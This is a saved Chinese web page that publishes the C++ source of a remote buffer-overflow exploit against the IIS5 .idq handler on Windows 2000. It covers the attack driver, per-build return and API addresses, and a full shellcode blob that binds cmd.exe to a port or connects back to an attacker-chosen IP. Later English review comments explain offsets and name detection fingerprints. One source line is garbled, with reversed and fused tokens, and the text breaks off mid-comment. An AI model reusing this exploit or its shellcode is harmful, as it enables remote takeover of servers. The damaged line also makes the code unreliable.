<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0062)http://snake.gnuchina.org/IISOverflow/snake_iis_idq_source.htm -->
<HTML><HEAD><TITLE>SNAKE的IIS5_IDQ命令行溢出程序源代码</TITLE>
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<META content=zh-cn http-equiv=Content-Language>
<META content="Microsoft FrontPage 5.0" name=GENERATOR>
<META content=FrontPage.Editor.Document name=ProgId></HEAD>
<BODY bgColor=#000000 text=#ffffff>
<P align=center><FONT color=#00ff00 
size=4><B>SNAKE的IIS5_IDQ命令行溢出程序源代码</B></FONT></P>
<P> </P>
<P> </P>
<P> </P>
<P>文件结构:</P>
<UL>
  <LI><FONT color=#00ffff>cpp文件:&nbsp;&nbsp;&nbsp; iisidqoverflow.cpp 和 
  SkShellCodeFunc.cpp</FONT> 
  <LI><FONT color=#00ffff>头文件:&nbsp;&nbsp;&nbsp;&nbsp; SkShellCodeFunc.h</FONT> 
  <LI><FONT color=#ffff00><B>功能文件:&nbsp; WSAStart.cpp和SnakeSocket.cpp wsastart.h 
  snakesocket.h(这4个文件不提供...因为,他们实现的只是WSAStart和socket的功能,你要成功编译本程序,必须自己替换相关的WSAStart和socket功能的代码.特此声明!)</B></FONT> 

  <LI><FONT color=#00ffff>中间文件:&nbsp; iis_idq.asm 
  --用来实现shellcode数据的文件,编译的时候,不必编译,只是为了中间产生shellcode数据.它实现了溢出后,程序的处理:创建一个进程,并且绑定一个端口。这个还可以用于其他的windows溢出.</FONT> 
  </LI></UL>
<P> </P>
<P><FONT color=#ff00ff><B>文件1:iisidqoverflow.cpp (主文件)</B></FONT></P><PRE>#include &lt;afxwin.h&gt;
#include "snakesocket.h"
#include "wsastart.h"
#include "SkShellCodeFunc.h"

//function predeclare.
//Obtain the required address information. Defined elsewhere (not on this
//page); main() calls it in "GetAddr" mode and prints whatever it writes into
//the caller-supplied buffer of iMaxSize bytes.
void GetNecesProcAddr( char *szInfo, int iMaxSize);
//Generate my shellcode. Defined in SkShellCodeFunc.cpp (below). Returns the
//number of bytes written to pszOutput, or 0 when SystemType is unsupported.
//NOTE(review): the garbled text of SendIDQExploit() further down appears to
//call a helper named "MakeIDQShellCode" with a different argument order; that
//name does not match this prototype — confirm against the original source.
int Sk_Make_IIS5_IDQ_ShellCode(char *pszOutput, SYSTEM_TYPE SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszBindCmd);


//Show help.
//Prints the argv layout consumed by main() and, in the loop on the damaged
//line below, one "index -- name" line per SYSTEM_TYPE via GetSystemName().
//No parameters, no return value; output goes to stdout only.
void ShowHelp()
{
  int i;

  printf("运行参数:  操作系统类型 目的地址 web端口 1 溢出监听端口 &lt;输入命令1&gt;\r\n");
  printf("    或者:  操作系统类型 目的地址 web端口 2 溢出连接IP 溢出连接端口 &lt;输入命令1&gt;\r\n");
  printf("\r\n\r\n  其中,如果输入命令参数没有输入,那么,默认为:\"cmd.exe /c + dir\"");
  printf("\r\n  如果为1,那么,将输入新的命令.");

  printf("\r\n\r\n支持的操作系统 类型: ----\r\n");
  
  // NOTE(review): the next physical line is damaged by the page extraction
  // (tokens are reversed and several statements are fused together). Read from
  // right to left it appears to contain: the rest of this for-loop
  // (printf("%d -- %s\r\n", i, GetSystemName((SYSTEM_TYPE)i))), a version
  // banner printf, the closing brace of ShowHelp(), the comment "send overflow
  // data", and the head of BOOL SendIDQExploit(SOCKET msocket, SYSTEM_TYPE
  // SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszExecCmd), which
  // declares a 4096-byte szBuff and an int iLen, fills the buffer through a
  // helper named "MakeIDQShellCode", and enters the block below when iLen > 0.
  // Treat this as a reading of the garbled text, not as the original source.
  for( i=0; i<MAX_SYSTEM_TYPE_NUM; iLen="MakeIDQShellCode(" if( lpszExecCmd); pConnectStruct, SystemType, szBuff, sizeof(szBuff)); iLen; int szBuff[4096]; char { lpszExecCmd) LPCTSTR *pConnectStruct, ConnectStruct SYSTEM_TYPE msocket, SOCKET SendIDQExploit( BOOL 发送溢出数据 } 07\r\n?); 2000 snake12.top263.net http: printf(?\r\n ?); snake. by 0013 Build Overflow.v2.0 IDQ IIS5 ); (SYSTEM_TYPE)i) GetSystemName( i, %s\r\n?, -- %d printf(? i++){> 0){
    send( msocket, szBuff, iLen, 0);
  }

  // SendIDQExploit() result: true when the built buffer was non-empty. The
  // return value of send() itself is never checked, so "true" does not mean
  // the bytes reached the peer.
  return (iLen&gt;0)?true:false;
}

// Command-line entry point.
//
// argv layout (as parsed below; ShowHelp() prints the same):
//   argv[1]   SYSTEM_TYPE index, or the literal "GetAddr"
//   argv[2]   target host name/address (resolved with CSnakeSocket::GetHostAddr)
//   argv[3]   web port
//   argv[4]   Sk_ConnectType: LISTEN_ON_PORT or CONNECT_TO_HOST
//   argv[5..] listen port (type 1), or connect host + connect port (type 2)
// One extra trailing argument (argc >= 7 / argc >= 8) turns on an interactive
// prompt for the command string; otherwise the default in szCommand is used.
//
// Returns 0 on every path; errors are only reported through printf(), so the
// process exit status cannot distinguish success from failure.
int main(int argc, char *argv[])
{
  CWSAStart wsaStart;        // Winsock start-up/clean-up wrapper (class not on this page)
  CSnakeSocket snakeSocket;  // socket wrapper (class not on this page)
  WORD wPort;
  DWORD dwIP;

  if( argc &gt; 1){
    // "GetAddr" mode: no network activity. Prints whatever GetNecesProcAddr()
    // writes (its body is not on this page) plus the local OS version.
    if( stricmp( argv[1], "GetAddr") == 0){
      char szTemp[12048];
      GetNecesProcAddr(szTemp, sizeof(szTemp) );

      printf("%s\r\n",szTemp);

      OSVERSIONINFO osInfo;
      
      osInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
      GetVersionEx( &amp;osInfo);
      printf("Version: %d - %d. Build:%d. ID:%d\r\n[%s]\r\n", 
        osInfo.dwMajorVersion, osInfo.dwMinorVersion,
        osInfo.dwBuildNumber, osInfo.dwPlatformId,
        osInfo.szCSDVersion);
      return 0;
    }
  }
  if( argc &lt; 5){
    ShowHelp();
    return 0;
  }
  // NOTE(review): every early "return 0" after this point skips
  // wsaStart.CleanUP(); only the normal path at the bottom pairs the calls.
  wsaStart.StartUP();

  // Only the upper bound is checked. atoi() can return a negative number, and
  // if SYSTEM_TYPE can hold it, it is passed on unvalidated — TODO confirm the
  // enum's underlying type / add a lower-bound check.
  SYSTEM_TYPE SystemType = (SYSTEM_TYPE)atoi(argv[1]);
  if( SystemType &gt;= MAX_SYSTEM_TYPE_NUM){
    printf("操作系统类型 不正确.\r\n");
    ShowHelp();
    return 0;
  }
  // dwIP is used only for this validity check; connect() below resolves
  // argv[2] again itself.
  dwIP = snakeSocket.GetHostAddr( argv[2]);
  if( dwIP == 0){
    printf("输入地址不对.\r\n");
    return 0;
  }

  Sk_ConnectType connectType;
  ConnectStruct connectStruct;
  char szCommand[129]="cmd.exe /c dir c:\\";
  BOOL bInputCommand=false;

  connectType = (Sk_ConnectType)atoi(argv[4]);
  connectStruct.byConnectType = connectType;
  switch(connectType){
  case LISTEN_ON_PORT:
    // NOTE(review): only argc >= 5 has been established here, so with exactly
    // five arguments argv[5] is the terminating null pointer and atoi() is
    // handed NULL — add an argc check before reading it.
    connectStruct.wListenPort = atoi(argv[5]);
    if( argc &gt;= 7){
      bInputCommand = true;
    }
    break;
  case CONNECT_TO_HOST:
    if( argc &lt; 6){
      printf("参数不足够.\r\n");
      return 0;
    }
    // NOTE(review): unlike argv[2] above, a failed resolution (0) of argv[5]
    // is not rejected here; and with argc == 6, argv[6] is the terminating
    // null pointer — the guard above should be argc < 7.
    connectStruct.dwConnectIP = snakeSocket.GetHostAddr(argv[5]);
    connectStruct.wConnectPort = atoi(argv[6]);
    if( argc &gt;= 8){
      bInputCommand = true;
    }
    break;
  default:
    printf("溢出类型不正确.\r\n");
    return 0;
  }

  if( bInputCommand){
    printf("\r\n请输入绑定的命令:");
    // NOTE(review): "%s" has no width limit, so input longer than 128 bytes
    // overruns szCommand on the tool's own stack; "%128s" would bound it.
    // "%s" also stops at the first whitespace, so a command with arguments
    // cannot be entered this way.
    scanf( "%s",szCommand);
  }

  snakeSocket.CreateSocket();
  wPort = atoi(argv[3]);

  if( !snakeSocket.connect( argv[2], wPort)){
    printf("连接目的机器 %s:%d 失败.\r\n", argv[2], wPort);
    return 0;
  }
  else
    printf("连接目的机器 %s:%d OK.\r\n", argv[2], wPort);

  // SendIDQExploit() (defined above; its header is on the garbled line)
  // returns false for any zero-length build, not only for an unsupported
  // system type, so the failure message below is a guess at the cause.
  BOOL bValue = SendIDQExploit( snakeSocket.m_Socket, SystemType, &amp;connectStruct, szCommand);

  if( bValue){
    printf( "发送shellcode 到 %s:%d OK\r\n", argv[2], wPort);
    printf(" 现在,如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [%s] 结果了...,good luck.!", szCommand);
  }
  else{
    printf( "发送失败, 对方系统类型不支持\r\n");
  }

  snakeSocket.CloseSocket();
  wsaStart.CleanUP();

  return 0;
}

</PRE>
<P><FONT color=#ff00ff><B>文件2. SkShellCodeFunc.cpp 
(发送shellcode的文件)</B></FONT></P><PRE>//SkShellCodeFunc.cpp
////////////////////////////////////////////////////////////////////////////////
// shellcode 函数
////////////////////////////////////////////////////////////////////////////////
// start by snake. 2001/7/11
////////////////////////////////////////////////////////////////////////////////

#include &lt;windows.h&gt;
#include "SkShellCodeFunc.h"

//Search for the address of JUMP_EBX.
//Declared here only; the definition is not on this page and nothing in the
//portion of SkShellCodeFunc.cpp shown here calls it. dwArray/wMaxCount
//presumably describe a DWORD table to scan — TODO confirm against the body.
WORD Search_Jump_Ebx_Code(DWORD *dwArray, WORD wMaxCount);


// Display names, one per SYSTEM_TYPE value plus a trailing "Unknown.." sentinel
// (hence MAX_SYSTEM_TYPE_NUM+1 rows; GetSystemName() clamps to the sentinel).
// Entries prefixed "--" are exactly the ones whose AllSystemFuncAddr[] row
// below is all zeros, i.e. listed but not actually supported.
static const char szSystemName[MAX_SYSTEM_TYPE_NUM+1][60]=
{
  "IIS5中文Win2k Sp0",
  "IIS5中文Win2k Sp1",
  "IIS5中文Win2k Sp2",

  "IIS5 English Win2k Sp0",
  "IIS5 English Win2k Sp1",
  "--IIS5 English Win2k Sp2",


  "IIS5 Japanese Win2k Sp0",
  "IIS5 Japanese Win2k Sp1",
  "--IIS5 Japanese Win2k Sp2",


  "IIS5 Mexico Win2k",
  "--IIS5 Mexico Win2k sp1",
  "--IIS5 Mexico Win2k sp2",

  "Unknown..",
};

//Get the name of a system.
//type:    SYSTEM_TYPE index into szSystemName[]; values above
//         MAX_SYSTEM_TYPE_NUM are clamped to the "Unknown.." sentinel row.
//Returns: pointer to the static name string (never NULL for in-range input).
//NOTE(review): only the upper bound is clamped. main() builds the type with
//(SYSTEM_TYPE)atoi(argv[1]), so if SYSTEM_TYPE is signed a negative value
//indexes before the table — add a "type < 0" clamp as well.
LPCTSTR GetSystemName( SYSTEM_TYPE type)
{
  if( type &gt; MAX_SYSTEM_TYPE_NUM) type = MAX_SYSTEM_TYPE_NUM;
  return szSystemName[type];
}

// One row of AllSystemFuncAddr[]: the three per-build constants that
// Sk_Make_IIS5_IDQ_ShellCode() reads for the selected SYSTEM_TYPE.
typedef struct _Call_Func_Addr{
  DWORD dwGetModuleHandle;  // patched into the payload at dwGetModuleHandle_Offset; 0 marks the row unsupported
  DWORD dwGetProcAddress;   // patched into the payload at dwGetProcAddress_Offset
  DWORD dwRetJmpEbxAddr;    // written into the request as two %u escapes (low word first)
}Call_Func_Addr;

//Addresses of the 2 functions (different systems have different addresses),
//plus a third member, the return address. One row per SYSTEM_TYPE, indexed by
//the wSelectValue chosen in Sk_Make_IIS5_IDQ_ShellCode(). That function returns
//0 when dwGetModuleHandle is 0, which is how the all-zero rows below are
//treated as unsupported (they match the "--" entries of szSystemName[]).
//Rows written as { 0, 0 } leave dwRetJmpEbxAddr value-initialised to 0.
static const Call_Func_Addr AllSystemFuncAddr[MAX_SYSTEM_TYPE_NUM]=
{
  { 0x77e756db, 0x77e7564b, 0x77e4ac97}, //IIS5_WIN2K_CHINESE_SP0
  { 0x77e6380e, 0x77e67031, 0x77E4BF17}, //IIS5_WIN2K_CHINESE_SP1
  { 0x77e66c42, 0x77e69ac1, 0x77e4ac97}, //IIS5_WIN2K_CHINESE_SP2

  { 0x77E956DB, 0x77E9564B, 0x77E6F533}, //IIS5_WIN2K_ENGLISH_SP0
  { 0x77E8380E, 0x77E87031, 0x77E6E52B}, //IIS5_WIN2K_ENGLISH_SP1
  { 0, 0}, //IIS5_WIN2K_ENGLISH_SP2 (unsupported)

  { 0x77E656DB, 0x77E6564B, 0x77E3AF17}, //IIS5_WIN2K_JAPANESE_SP0,
  { 0x77E5380E, 0x77E57031, 0x77E3BCAF}, //IIS5_WIN2K_JAPANESE_SP1,
  { 0, 0}, //IIS5_WIN2K_JAPANESE_SP2 (unsupported)

  { 0x77E956DB, 0x77E9564B, 0x77E596D2 },//IIS_WIN2K_MEXICO_SP0,
  { 0, 0, 0 },//IIS_WIN2K_MEXICO_SP1 (unsupported; original comment said SP0)
  { 0, 0, 0 },//IIS_WIN2K_MEXICO_SP2 (unsupported; original comment said SP0)
};

//The analysis behind the #define below is copied from isno's article, thanks isno.
//Sk_Make_IIS5_IDQ_ShellCode() starts writing the %u escapes at
//szBuf[IIS5_IDQ_EXCEPTION_OFFSET-2].
#define IIS5_IDQ_EXCEPTION_OFFSET 234 /* exception handler offset */ 
static unsigned char forwardjump[]= "%u08eb"; 
/*This overwrites the exception structure with a jmp 08h, used to reach the
  code further on that locates the shellcode.*/ 

//Text in %uXXXX form; the receiving side decodes each unit, so every pair of
//bytes reads reversed here.
static unsigned char jump_to_shell[]= 
"%uC033%uB866%u031F%u0340%u8BD8%u8B03" 
"%u6840%uDB33%u30B3%uC303%uE0FF"; 
/* 
  Jumps to the shellcode; I will not explain it line by line, read it yourself
  if interested. Note that every two bytes are reversed: %uC033 becomes
  \x33\xC0 after conversion. 
*/ 

//The data below binds a shell to a port and listens.
//Payload template: Sk_Make_IIS5_IDQ_ShellCode() memcpy()s it into szCreateCode
//and then overwrites the *_Offset positions defined after it with the
//connect type, encoded port/IP words and the two kernel32 addresses. It is a
//non-const global, so any code in the process could modify it in place.
//Detection note: the tail of the blob is plain ASCII — the import names it
//resolves at run time ("kernel32.dll", "TerminateProcess", "CreatePipe",
//"GetStartupInfoA", "CreateProcessA", ... "ws2_32.dll", "socket", "bind",
//"listen", "accept", "send", "recv", ...) and the default command "cmd.exe",
//separated by runs of '+' (0x2B) and preceded by small count bytes. Those
//strings are a usable fingerprint for network and memory-scanning rules.
char szSnakeBindShellCode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x55\x8B\xEC\x33\xC0\x40\xC1\xE0\x0B\x2B\xE0\xEB\x03\x90\xEB\x4E\xE8\xF9\xFF\xFF\xFF\x55\x8B\xEC\x57\x51\x50\x52\x8B\x7D\x08\x8B\x4D\x0C\x8B\x45\x10\x8B\x55\x14\xF2\xAE\x67\xE3\x06\x4F\x88\x17\x41\xEB\xF5\x5A\x58\x59\x5F\x5D\xC3\x53\x51\x52\x33\xD2\x50\x5B\xC1\xEB\x10\x50\x59\x80\xFF\x01\x74\x02\xFE\xCB\x8A\xC3"
"\x85\xD2\x75\x08\xC1\xE0\x08\x51\x5B\x42\xEB\xEB\x5A\x59\x5B\xC3\xEB\x4F\x55\x8B\xEC\x56\x57\x52\x51\x53\x50\x8B\x7D\x08\x8B\x75\x0C\x33\xDB\x33\xC9\xB1\x80\x03\xF1\x8A\x0E\x46\x51\x8A\x1E\x46\x56\x8B\x45\x10\xFF\xD0\x03\xF3\x33\xC9\x8A\x0E\x46\x51\x8A\x1E\x46\x50\x56\x56\x50\x8B\x4D\x14\xFF\xD1\x89\x07\x83\xC7"
"\x04\x5E\x58\x03\xF3\x59\xE2\xE7\x59\xE2\xD3\x58\x5B\x59\x5A\x5F\x5E\x5D\xC3\xEB\x7C\x55\x8B\xEC\x33\xC0\x66\xB8\xF0\x03\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8D\xBD\xC0\xFC\xFF\xFF\x33\xC0\xB0\x02\x57\x50\x8B\x46\x54\xFF\xD0\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\x38\xFF\xD0\x8B\x55\x0C\x8D\x1A\x8A\x0B\x50\x8D"
"\xBD\x10\xFF\xFF\xFF\x8D\x1F\x33\xC0\xB0\x02\x66\x89\x03\x58\x80\xF9\x01\x75\x69\x50\x50\x8B\x42\x04\xE8\x31\xFF\xFF\xFF\x8B\xC8\x86\xE9\x58\x8D\x5F\x02\x8B\x55\x0C\x66\x89\x0B\x33\xC0\x8D\x5F\x04\x89\x03\x58\x50\x33\xC9\xB1\x10\x51\x57\x50\x8B\x46\x3C\xFF\xD0\xEB\x02\xEB\x4D\x58\x50\x33\xC9\x41\x51\x50\x8B\x46"
"\x40\xFF\xD0\x58\x50\x33\xC9\xB1\x10\x8D\xBD\x40\xFF\xFF\xFF\x89\x0F\x57\x8D\xBD\x10\xFF\xFF\xFF\x57\x50\x8B\x46\x44\xFF\xD0\x5A\x50\x52\x8B\x46\x58\xFF\xD0\x58\x83\xF8\xFF\x74\x7A\xEB\x53\x50\x8B\x42\x10\xE8\xC9\xFE\xFF\xFF\x8B\xC8\x86\xE9\x8D\x5F\x02\x66\x89\x0B\xEB\x02\xEB\x6A\x8B\x42\x08\xE8\xB3\xFE\xFF\xFF"
"\x8B\xC8\xC1\xE1\x10\x8B\x42\x0C\xE8\xA6\xFE\xFF\xFF\x66\x8B\xC8\x8D\x5F\x04\x89\x0B\x58\x50\x33\xC9\xB1\x10\x51\x57\x50\x8B\x46\x5C\xFF\xD0\x8B\xC8\x58\x67\xE3\x0B\x90\x50\x8B\x46\x58\xFF\xD0\x33\xC0\xEB\x25\x50\x50\x5A\x8D\xBD\x10\xFF\xFF\xFF\x33\xC0\xB0\x01\x89\x07\xC1\xE0\x02\x50\x57\x66\xB8\x06\x10\x50\x66"
"\xB8\xFF\xFF\x50\x52\x8B\x46\x50\xFF\xD0\x58\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x62\x55\x8B\xEC\x57\x56\x52\x51\x53\x50\x8B\x7D\x0C\x57\x5A\x33\xC0\x8D\x7F\x24\x57\x33\xC9\xB1\x44\xF3\xAA\x5F\x8D\x37\xB1\x44\x89\x0E\x8D\x77\x2C\x66\xB9\x01\x01\x89\x0E\x57\x8D\x7F\x38\x8D\x72\x0C\x8B\x06\x89\x07\x5F\x57\x8D"
"\x7F\x3C\x8D\x72\x04\x8B\x06\x89\x07\x5F\x8B\x75\x08\x8B\x46\x30\xFF\xD0\x33\xC9\x51\x41\x51\x41\x51\x8D\x57\x40\x52\x50\x56\x8B\x75\x0C\x8D\x76\x04\x8B\x1E\x5E\xEB\x02\xEB\x42\x53\x50\x8B\x46\x2C\xFF\xD0\x33\xC0\x8B\x7D\x0C\x8D\x57\x14\x52\x8D\x57\x24\x52\x50\x50\x50\x40\x50\x48\x50\x50\x8B\x55\x10\x52\x50\x8B"
"\x46\x0C\xFF\xD0\x8B\x47\x0C\x50\x8B\x46\x34\xFF\xD0\x8B\x47\x04\x50\x8B\x46\x34\xFF\xD0\x58\x5B\x59\x5A\x5E\x5F\x8B\xE5\x5D\xC3\xEB\x33\x55\x8B\xEC\x56\x57\x52\x51\x53\x50\x8B\x75\x08\x8B\x7D\x0C\x8B\x47\x10\x50\x8B\x46\x58\xFF\xD0\x8B\x07\x50\x8B\x46\x34\xFF\xD0\x8B\x47\x08\x50\x8B\x46\x34\xFF\xD0\x58\x5B\x59"
"\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x77\x55\x8B\xEC\x33\xC0\x66\xB8\xF0\x02\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8B\x7D\x0C\x8D\x55\xF8\x33\xC0\x40\x89\x02\x8D\x55\xF8\x8B\x02\x85\xC0\x74\x2A\x33\xC0\x50\xB0\xF0\x50\x8D\x85\x08\xFF\xFF\xFF\x50\x8D\x5F\x10\x8B\x03\x50\x8B\x46\x4C\xFF\xD0\x83\xF8\xFF\x75\x0F\x50"
"\x5A\x8B\x46\x28\xFF\xD0\x66\x3D\x4C\x27\x74\x28\xEB\x7F\x85\xC0\x74\x7B\x7E\x20\x33\xD2\x52\x8D\x5D\xFC\x53\x50\x8D\x9D\x08\xFF\xFF\xFF\x53\x8B\x47\x08\x50\x8B\x46\x18\xFF\xD0\x85\xC0\x74\x5D\xEB\x02\xEB\x62\x33\xC0\x50\x8D\x55\xFC\x52\x50\x50\x50\x8B\x07\x50\x8B\x46\x10\xFF\xD0\x8B\x45\xFC\x85\xC0\x74\x3B\x33"
"\xC0\x50\x8D\x55\xFC\x52\xB0\xF0\x50\x8D\x95\x08\xFF\xFF\xFF\x52\x8B\x07\x50\x8B\x46\x1C\xFF\xD0\x85\xC0\x74\x23\x33\xC0\x50\x8B\x45\xFC\x50\x8D\x95\x08\xFF\xFF\xFF\x52\x8B\x47\x10\x50\x8B\x46\x48\xFF\xD0\x83\xF8\xFF\x74\x07\xEB\xAC\xE9\x4C\xFF\xFF\xFF\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x72\x55\x8B\xEC\x33"
"\xC0\xB0\xF0\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8B\x7D\x0C\x33\xDB\x8D\x7D\xF0\x8D\x57\x04\x89\x1A\x8D\x57\x08\x43\x89\x1A\x8D\x17\xB3\x0C\x89\x1A\x33\xDB\x57\x53\x57\x8B\x7D\x0C\x8D\x57\x04\x89\x1A\x52\x8D\x17\x52\x8B\x46\x04\xFF\xD0\x5F\x85\xC0\x74\x1F\x33\xDB\x53\x57\x8B\x7D\x0C\x8D\x57\x08\x52\x8D\x57"
"\x0C\x89\x1A\x52\x8B\x46\x04\xFF\xD0\x85\xC0\x74\x05\x33\xC0\x40\xEB\x05\x33\xC0\xEB\x01\x90\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\x8D\x34\x24\x8B\x36\x33\xC9\x66\xB9\xCC\x04\x03\xF1\x8D\xBD\x30\xFE\xFF\xFF\x57\x66\xB9\xFA\x01\xF3\xA4\x5F\x57\x33\xC9\x51\xB1\x2B\x51\x66\xB9\xE6\x01\x51\x33\xDB\xB3\x14\x03\xFB\x57"
"\xE8\xCC\xFB\xFF\xFF\x83\xC4\x10\x33\xC9\x66\xB9\xDD\x01\x8B\xF7\x03\xF1\x8B\x46\x04\x50\x8B\x06\x50\x57\x8D\xB5\x30\xFD\xFF\xFF\x56\xE8\xF6\xFB\xFF\xFF\x83\xC4\x10\x5F\x57\x56\xE8\x3C\xFC\xFF\xFF\x83\xC4\x08\x85\xC0\x74\x57\x8D\xBD\x10\xFC\xFF\xFF\x8D\x5F\x10\x89\x03\x57\x56\xE8\x16\xFF\xFF\xFF\x83\xC4\x08\x85"
"\xC0\x74\x3E\x8D\xBD\x30\xFE\xFF\xFF\x33\xC0\xB0\x14\x03\xF8\x57\x8D\xBD\x10\xFC\xFF\xFF\x57\x56\xE8\x3B\xFD\xFF\xFF\x83\xC4\x0C\x57\x56\xE8\x0E\xFE\xFF\xFF\x83\xC4\x08\x57\x56\xE8\xCF\xFD\xFF\xFF\x83\xC4\x08\x33\xC0\x50\x8D\x57\x14\x8B\x02\x50\x8B\x06\xFF\xD0\x33\xC0\x50\x8B\x46\x24\xFF\xD0\xC3\x8B\xE5\x5D\x90"
"\x90\x02\xFF\xFF\xFF\x51\x01\x01\x02\x01\x02\x25\x01\xC0\x01\xA8\x01\x58\x01\x01\x02\x63\x6D\x64\x2E\x65\x78\x65\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B"
"\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x02\x0E\x6B\x65\x72\x6E\x65"
"\x6C\x33\x32\x2E\x64\x6C\x6C\x2B\x2B\x0E\x11\x54\x65\x72\x6D\x69\x6E\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x2B\x0B\x43\x72\x65\x61\x74\x65\x50\x69\x70\x65\x2B\x10\x47\x65\x74\x53\x74\x61\x72\x74\x75\x70\x49\x6E\x66\x6F\x41\x2B\x0F\x43\x72\x65\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x41\x2B\x0E\x50\x65\x65\x6B"
"\x4E\x61\x6D\x65\x64\x50\x69\x70\x65\x2B\x0C\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x2B\x0B\x57\x72\x69\x74\x65\x46\x69\x6C\x65\x2B\x2B\x09\x52\x65\x61\x64\x46\x69\x6C\x65\x2B\x06\x53\x6C\x65\x65\x70\x2B\x0C\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x2B\x0E\x47\x65\x74\x4C\x61\x73\x74\x45\x72\x72\x6F\x72"
"\x2B\x2B\x10\x44\x75\x70\x6C\x69\x63\x61\x74\x65\x48\x61\x6E\x64\x6C\x65\x2B\x12\x47\x65\x74\x43\x75\x72\x72\x65\x6E\x74\x50\x72\x6F\x63\x65\x73\x73\x2B\x0C\x43\x6C\x6F\x73\x65\x48\x61\x6E\x64\x6C\x65\x2B\x0B\x77\x73\x32\x5F\x33\x32\x2E\x64\x6C\x6C\x2B\x0B\x07\x73\x6F\x63\x6B\x65\x74\x2B\x05\x62\x69\x6E\x64\x2B"
"\x07\x6C\x69\x73\x74\x65\x6E\x2B\x07\x61\x63\x63\x65\x70\x74\x2B\x05\x73\x65\x6E\x64\x2B\x05\x72\x65\x63\x76\x2B\x0B\x73\x65\x74\x73\x6F\x63\x6B\x6F\x70\x74\x2B\x0B\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x2B\x0C\x63\x6C\x6F\x73\x65\x73\x6F\x63\x6B\x65\x74\x2B\x08\x63\x6F\x6E\x6E\x65\x63\x74\x2B\x0C\x67\x65\x74"
"\x68\x6F\x73\x74\x6E\x61\x6D\x65\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\xDB\x56\xE7\x77\x4B\x56\xE7\x77\x00";

//My private information:
//Marker string that Sk_Make_IIS5_IDQ_ShellCode() memcpy()s to the start of the
//request buffer. It therefore appears verbatim in every request this tool
//emits, which makes it a cheap network-signature for detecting the tool.
static const char szSnakeSign[]="snake_program_code_v2.0";

// Byte offsets into szSnakeBindShellCode[] that Sk_Make_IIS5_IDQ_ShellCode()
// overwrites with run-time values. The numbers are relative to the end of the
// leading \x90 run, whose length PREHEAD_NOP_SIZE (0x24 = 36) appears to match
// the first two string fragments of the blob — verify before changing either.
// The macros are not parenthesised; that is only safe because every use on
// this page is a bare array index.
#define PREHEAD_NOP_SIZE 0x24

#define dwConnectType_Offset 1249+PREHEAD_NOP_SIZE   // 1 byte: LISTEN_ON_PORT / CONNECT_TO_HOST
#define dwListenPort_Offset 1253+PREHEAD_NOP_SIZE    // DWORD: Convert_Ansi_Word_To_Sk_Long(wListenPort)
#define dwConnectIP1_Offset 1257+PREHEAD_NOP_SIZE    // DWORD: encoded upper 16 bits of dwConnectIP
#define dwConnectIP2_Offset 1261+PREHEAD_NOP_SIZE    // DWORD: encoded lower 16 bits of dwConnectIP
#define dwConnectPort_Offset 1265+PREHEAD_NOP_SIZE   // DWORD: Convert_Ansi_Word_To_Sk_Long(wConnectPort)
#define dwExecCommand_Offset 1269+PREHEAD_NOP_SIZE   // command text; its use is beyond this page
#define wExecCommandSize 128                         // command field length, '+'-padded (szExecTemp)
#define dwGetModuleHandle_Offset 1746+PREHEAD_NOP_SIZE // DWORD: raw AllSystemFuncAddr[].dwGetModuleHandle
#define dwGetProcAddress_Offset 1750+PREHEAD_NOP_SIZE  // DWORD: raw AllSystemFuncAddr[].dwGetProcAddress

// Byte values (NUL, LF, CR) that Convert_Ansi_Word_To_Sk_Long() re-encodes so
// they never appear in the patched-in words. Non-const, non-static global;
// nothing on this page writes it, so it could be declared static const.
BYTE byReservedValue[]={ 0, 0x0a, 0x0d};

;//Convert a standard WORD -&gt; snake ShellCode reserved value.
;//If a byte == 0, 0x0a or 0x0d, the high part becomes 2 and the low part is +1.
;//                               Otherwise the high part becomes 1 and the low part is unchanged.
// (The leading ';' on the three lines above are empty declarations at file
//  scope — they compile but serve no purpose.)
//
// Encodes the two bytes of wValue into a DWORD so that no encoded byte equals
// an entry of byReservedValue[]. Each source byte b becomes a 16-bit unit:
// 0x0100|b when b is not reserved, 0x0200|(b+1) when it is. The unit for the
